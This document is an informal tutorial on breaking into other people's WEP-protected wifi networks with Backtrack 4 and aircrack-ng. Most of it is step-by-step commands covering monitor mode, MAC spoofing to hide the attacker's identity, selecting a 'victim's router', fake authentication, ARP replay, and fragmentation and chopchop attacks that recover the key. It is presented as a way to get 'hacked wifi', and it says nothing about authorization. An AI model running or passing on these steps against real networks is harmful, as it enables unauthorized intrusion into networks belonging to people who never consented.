First, you will need to have Backtrack 4 (LINK)
*** I figure that if you are smart enough to be into hacking you will at least know how to burn an image file to a DVD, so after you do that, boot the DVD and run BT4.

  • Login: root
  • Password: toor

Once logged in, type in: startx
BT4 is now set up; here are the next steps.

  • Open konsole and type the following to start up network connections.
    • /etc/init.d/networking start
  • Now we are going to put the network card into monitor mode by typing the following.
    • airmon-ng
      (You will find your Interface here)
  • So first start monitor mode on the interface
    • airmon-ng start wlan0 (or wlan1)
      (depends on what it reads your card as, replace as needed)
  • Let's spoof your MAC address first by typing these next commands.
    • ifconfig wlan1 down
      macchanger -r wlan1
      ifconfig wlan1 up
    • This changes our MAC address so it is not the one that the computer we are connecting to sees by default
  • Time to start finding our victim's router; type in konsole:
    • airodump-ng mon0
    • This will show the list, and once you find one that suits your interest, continue.
  • Once found, press CTRL + C, copy the BSSID, get out of airodump, and then type into a new konsole:
    • airodump-ng -c (channel number) --bssid (the BSSID of the router) -w (what you want to save the cap file as) mon0 (the interface we are using)
    • example: airodump-ng -c 1 --bssid 11:22:33:44:55:66 -w wepcap mon0
  • Let's start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:
    • aireplay-ng -1 1 -a (the BSSID of the router) (the interface)
      example: aireplay-ng -1 1 -a 11:22:33:44:55:66 mon0
  • Almost done, we just need to continue the ARP cycle; open another konsole and type:
    • aireplay-ng -3 -b (the BSSID of the router) (the interface), and it will start replaying ARPs.
    • Collect a good amount of IVs, around 20k to 50k. Once it's there, press CTRL + C to stop the process and continue with the next step (cracking the cap file).
  • Time to start cracking that cap file :D Open a new konsole and type:
    • aircrack-ng -b (bssid) (file name)-01.cap
      example: aircrack-ng -b 11:22:33:44:55:66 wepcap-01.cap
  • Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)
  • Here are some alternative methods of using backtrack from Hakunamatata69's tutorial that are interesting and work too.

Fragmentation attack.
1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k -l -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap


Chopchop attack (aireplay-ng -4).
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
*** Be sure to open new Konsoles when necessary ***


Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyouwant)
fragment-*.xor = The * is replaced by a number (Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

